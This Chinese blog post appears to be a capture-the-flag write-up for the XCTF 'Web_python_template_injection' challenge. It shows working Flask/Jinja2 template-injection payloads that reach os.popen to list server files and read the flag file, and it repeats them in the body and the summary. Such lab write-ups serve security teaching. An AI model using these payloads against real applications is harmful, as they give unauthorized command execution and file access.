热门标签
热门文章
- 1【Android Studio】在Mac中更换JDK Location_mac 更换android studio 默认jdk版本
- 2蓝桥杯单片机第五届国赛题目_五届蓝桥杯单片机国赛真题
- 3学习笔记2--自动驾驶汽车的规划与控制_自动驾驶汽车决策与控制pdf
- 4单源最短路径复习--Dijkstra算法和Floyd算法_可以求出某一点到其他所有点的最短路径的是
- 5python中time库引用不正确的_下面关于 time 库引用不正确的是?_学小易找答案
- 6Cannot deserialize value of type `java.time.LocalDate` from Object value
- 7MySQL 8.0 安装部署3个注意事项_mysql8.0+为什么ssl
- 8Linux SSH免密通信 - “ssh-keygen”的基本用法;配置ssh 无需密码即可登录远程服务器
- 9一个快速从中文文本抽取关键短语的工具 ckpe 提取关键短语
- 10linux下安装Adobe Reader(acroread)_linux acroread
当前位置: article > 正文
攻防世界Web_python_template_injection_攻防世界python tamp
作者:小惠珠哦 | 2024-07-11 10:24:44
赞
踩
攻防世界python tamp
提示:本人24小时在线,如有疑问,可联系我。
文章目录
- 前言
- 一、题目?
- 二、解决方法
- 1.看看后台目录
- 2.题目提示是python模块
- 3.查看本地服务器文件
- config文件没有被禁用,接下来就简单了,直接查看服务器的本地文件有哪些,构造的的payload为:`/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}`  读取fl4g的相关内容信息,直接得到flag 构造的payload为:`/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}` 
- 总结
前言
提示:攻防世界Web_python_template_injection
一、题目?
感觉什么也看不出来。
二、解决方法
1.看看后台目录
用御剑和diresearch看看后台目录。
2.题目提示是python模块
直接尝试使用flask模板的漏洞试试,构造的payload为:/{{2*3}}
页面显示6,说明存在“SSTI” :
然后查看config文件,测试配置文件是否有被禁用,可以看到,配置文件包并没有被禁用。
构造的payload为:/{{config}}
3.查看本地服务器文件
config文件没有被禁用,接下来就简单了,直接查看服务器的本地文件有哪些,构造的的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
总结
记住:
构造的payload为:/{{2*3}}。说明存在“SSTI”
查看config文件,构造的payload为:/{{config}}。
查看本地服务器文件/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
答案。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/809703
推荐阅读
相关标签
